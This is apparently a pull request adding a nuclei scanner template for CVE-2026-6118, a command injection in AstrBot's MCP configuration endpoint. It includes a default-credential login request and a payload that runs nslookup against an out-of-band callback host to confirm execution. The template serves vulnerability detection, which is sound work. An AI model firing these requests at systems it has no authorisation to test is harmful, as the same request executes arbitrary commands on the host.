### PR TITLE
add nuclei template for CVE-2026-6118 (AstrBot MCP command injection)

### DIFF
--- a/http/cves/2026/CVE-2026-6118.yaml
+++ b/http/cves/2026/CVE-2026-6118.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-6118
 
 info:
-  name: AstrBot <= 4.22.1 - Command Injection via MCP Configuration
+  name: AstrBot <= 4.22.1 - Command Injection
   author: jyoti369
   severity: high
   description: |
@@ -65,6 +65,7 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'contains(interactsh_protocol, "dns")'
           - 'contains_all(body, "status", "MCP connection test failed")'
+          - 'contains(interactsh_protocol, "dns")'
           - 'status_code == 200'
+        condition: and

--- a/http/cves/2026/CVE-2026-6118.yaml
+++ b/http/cves/2026/CVE-2026-6118.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-6118
 
 info:
-  name: AstrBot <= 4.22.1 - Authenticated Command Injection via MCP Configuration
+  name: AstrBot <= 4.22.1 - Command Injection via MCP Configuration
   author: jyoti369
   severity: high
   description: |
@@ -24,7 +24,7 @@ info:
     vendor: AstrBotDevs
     product: AstrBot
     shodan-query: title:"AstrBot"
-  tags: cve,cve2026,astrbot,rce,command-injection,oast,default-login,intrusive
+  tags: cve,cve2026,astrbot,rce,oast,authenticated
 
 flow: http(1) && http(2)
 
@@ -35,7 +35,7 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"username":"astrbot","password":"77b90590a8945a7d36c963981a307dc9"}
+        {"username":"{{username}}","password":"{{md5(password)}}"}
 
     matchers:
       - type: word
@@ -62,13 +62,9 @@ http:
 
         {"name":"{{randstr}}","command":"nslookup","args":["{{interactsh-url}}"],"active":false}
 
-    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
           - 'contains(interactsh_protocol, "dns")'
-
-      - type: word
-        part: body
-        words:
-          - '"status"'
+          - 'contains_all(body, "status", "MCP connection test failed")'
+          - 'status_code == 200'

--- a/http/cves/2026/CVE-2026-6118.yaml
+++ b/http/cves/2026/CVE-2026-6118.yaml
@@ -1,0 +1,74 @@
+id: CVE-2026-6118
+
+info:
+  name: AstrBot <= 4.22.1 - Authenticated Command Injection via MCP Configuration
+  author: jyoti369
+  severity: high
+  description: |
+    AstrBot versions up to and including 4.22.1 contain a command injection vulnerability in the MCP server configuration endpoint. The /api/tools/mcp/add endpoint accepts arbitrary command and args fields that are passed directly to subprocess execution during the connection test, without any validation or allowlist enforcement. An attacker with dashboard access can execute arbitrary system commands with AstrBot process privileges.
+  impact: |
+    Authenticated attackers can execute arbitrary system commands, leading to full server compromise, data exfiltration, and lateral movement.
+  remediation: |
+    Upgrade AstrBot to version 4.22.2 or later which introduces command allowlisting and validation. Change default dashboard credentials immediately.
+  reference:
+    - https://github.com/AstrBotDevs/AstrBot/issues/7169
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-6118
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2026-6118
+    cwe-id: CWE-94
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: AstrBotDevs
+    product: AstrBot
+    shodan-query: title:"AstrBot"
+  tags: cve,cve2026,astrbot,rce,command-injection,oast,default-login,intrusive
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        POST /api/auth/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"username":"astrbot","password":"77b90590a8945a7d36c963981a307dc9"}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"token"'
+        internal: true
+
+    extractors:
+      - type: regex
+        name: token
+        part: body
+        group: 1
+        regex:
+          - '"token"\s*:\s*"([^"]+)"'
+        internal: true
+
+  - raw:
+      - |
+        POST /api/tools/mcp/add HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Authorization: Bearer {{token}}
+
+        {"name":"{{randstr}}","command":"nslookup","args":["{{interactsh-url}}"],"active":false}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(interactsh_protocol, "dns")'
+
+      - type: word
+        part: body
+        words:
+          - '"status"'


### PR DESCRIPTION
## CVE-2026-6118 - AstrBot MCP Server Configuration Command Injection

Adds a nuclei template for detecting CVE-2026-6118, a command injection vulnerability in AstrBot <= 4.22.1.

### Vulnerability Details

- **Product**: AstrBot (chatbot infrastructure)
- **Affected**: <= 4.22.1
- **Fixed in**: 4.22.2+
- **Severity**: High (CVSS 8.8)
- **Type**: Command Injection via MCP server configuration

The `/api/tools/mcp/add` endpoint accepts arbitrary `command` and `args` fields that are passed directly to subprocess execution during the MCP connection test. No allowlist or validation is applied, allowing authenticated users to execute arbitrary system commands.

### Template Flow

1. Login with default credentials (`POST /api/auth/login`)
2. Send MCP server add request with OOB DNS callback (`POST /api/tools/mcp/add`)
3. Verify command execution via interactsh DNS callback

### References

- https://github.com/AstrBotDevs/AstrBot/issues/7169
- https://nvd.nist.gov/vuln/detail/CVE-2026-6118
